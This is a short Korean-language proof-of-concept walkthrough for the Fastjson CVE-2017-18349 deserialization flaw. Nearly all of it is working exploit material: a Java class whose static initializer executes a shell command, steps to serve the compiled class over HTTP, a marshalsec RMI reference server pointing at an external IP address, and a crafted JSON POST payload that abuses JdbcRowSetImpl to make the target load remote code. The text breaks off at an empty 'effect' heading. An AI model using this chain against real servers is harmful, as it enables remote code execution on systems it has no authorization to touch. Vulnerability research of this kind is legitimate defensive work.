
Fastjson CVE-2017-18349 역직렬화 취약점에 대한 개념 증명 익스플로잇으로, 조작된 JSON 페이로드와 RMI 서버를 통한 원격 코드 실행을 시연합니다.
프로젝트를 Maven 프로젝트로 설정한 후 실행(참고: 높은 버전의 JDK를 사용하면 실패할 수 있으므로 JDK 1.8.65 버전을 사용하는 것이 좋습니다.) FastjsondemoApplication.java의 main 함수를 실행하면 됩니다. TouchFile.java 파일
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/flag_test"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
그 후 동일하게 버전 8의 javac로 컴파일하여 class 파일로 만듭니다.
javac TouchFile.java
Python으로 웹 서비스를 시작합니다.
python -m SimpleHTTPServer 80
marshalsec을 사용하여 RMIServer를 생성합니다.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://47.99.70.18/#TouchFile" 9999
요청 패킷을 수정합니다.
POST / HTTP/1.1
Host: 127.0.0.1:8080
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://47.99.70.18:9999/TouchFile",
"autoCommit":true
}
}
효과: 